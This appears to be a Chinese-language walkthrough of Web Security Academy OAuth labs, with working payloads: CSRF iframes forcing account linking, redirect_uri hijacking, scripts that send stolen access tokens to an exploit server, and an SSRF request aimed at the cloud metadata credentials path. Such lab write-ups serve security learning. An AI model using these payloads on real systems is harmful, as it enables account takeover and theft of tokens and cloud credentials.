通过 OAuth 隐式流程绕过身份验证
强制 OAuth 配置文件链接
首先通过正常的 登录方式登录
可以看到存在绑定社交媒体页面
这里的关键步骤在这里 其中存在的漏洞点就是 认证的链接 单单靠着一步执行的 而其中也没有别的 参数去防止csrf 假如让一个登录的人访问我们的 /oauth-linking?code=k-iE3ti7b74nj3jUM_3-LUhYVrhBu592wzmSmT0d7Tp 那么通过他的session 就会绑定到我们的社交媒体账号
<iframe src="https://0a67007d040dc680c337abec006100e0.web-security-academy.net/oauth-linking?code=duxFgvd9fTrdOEAgTRSaESfEQcXxdYLhQotN6vwuiDr"></iframe>
注意丢弃这个请求
通过 redirect_uri 劫持 OAuth 帐户
可以看到这里存在 redirect_uri 重定向
<iframe src="https://oauth-0a9b005904abc4e7c2add27502bd00cc.web-security-academy.net/auth?client_id=udxb47mhd9thi45c5z1pa&redirect_uri=https://exploit-0a42002104f9c4c9c203d31b010900c3.exploit-server.net/oauth-callback&response_type=code&scope=openid%20profile%20email"></iframe>
同样需要丢弃
通过开放重定向窃取 OAuth 访问令牌
尝试更改重定向 但是只能本域的请求
这里发现一个开放重定向
/auth?client_id=wcgy1zo0vkmt0bzxfyvh0&redirect_uri=https://0a36004703f50908c2814dc100f200bd.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0a7b00a9039a091fc2d14cf301a20094.exploit-server.net/exploit&response_type=token&nonce=1381684533&scope=openid%20profile%20email
<script>
if (!document.location.hash) {
window.location = 'https://oauth-0a480037034209e3c2374bb4026e0006.web-security-academy.net/auth?client_id=wcgy1zo0vkmt0bzxfyvh0&redirect_uri=https://0a36004703f50908c2814dc100f200bd.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0a7b00a9039a091fc2d14cf301a20094.exploit-server.net/exploit&response_type=token&nonce=1381684533&scope=openid%20profile%20email'
} else {
window.location = '/?'+document.location.hash.substr(1)
}
</script>
SSRF 通过 OpenID 动态客户端注册
/.well-known/openid-configuration
直接访问 这个地址
注册
POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 67
{
"redirect_uris" : [
"https://example.com"
]
}
其中返回了 一个新的client_id
这里的logo页面推测可能使用的是clinet_id 尝试添加一个logouri
POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 67
{
"redirect_uris" : [
"https://example.com"
],
"logo_uri" : "https://h5n0wfjfqk66i3yq7watum0ah1nsbnzc.oastify.com"
}
POST /reg HTTP/1.1
Host: oauth-0a7f00d40340a246c0f67ad5020700cf.web-security-academy.net
Content-Type: application/json
Content-Length: 141
{
"redirect_uris" : [
"https://example.com"
],
"logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}
通过代理页面窃取 OAuth 访问令牌
这里存在一个iframe
<script>
parent.postMessage({type: 'onload', data: window.location.href}, '*')
function submitForm(form, ev) {
ev.preventDefault();
const formData = new FormData(document.getElementById("comment-form"));
const hashParams = new URLSearchParams(window.location.hash.substr(1));
const o = {};
formData.forEach((v, k) => o[k] = v);
hashParams.forEach((v, k) => o[k] = v);
parent.postMessage({type: 'oncomment', content: o}, '*');
form.reset();
}
</script>
看下这段代码 主要用处是向父级窗口发送当前的url
<iframe src="https://oauth-0a930046033223f9c1af5bb902e60026.web-security-academy.net/auth?client_id=cktbsx655uw8sgmyd13v8&redirect_uri=https://0a77009103fc23e4c1a05d9e005f008c.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe>
<script>
window.addEventListener('message', function(e) {
fetch("/" + encodeURIComponent(e.data.data))
}, false)
</script>
/https://0a77009103fc23e4c1a05d9e005f008c.web-security-academy.net/post/comment/comment-form#access_token=hH1IDsHhNbW_lKdgwRhxoG7DAyKhhF5stMyn25VLY5h&expires_in=3600&token_type=Bearer&scope=openid profile email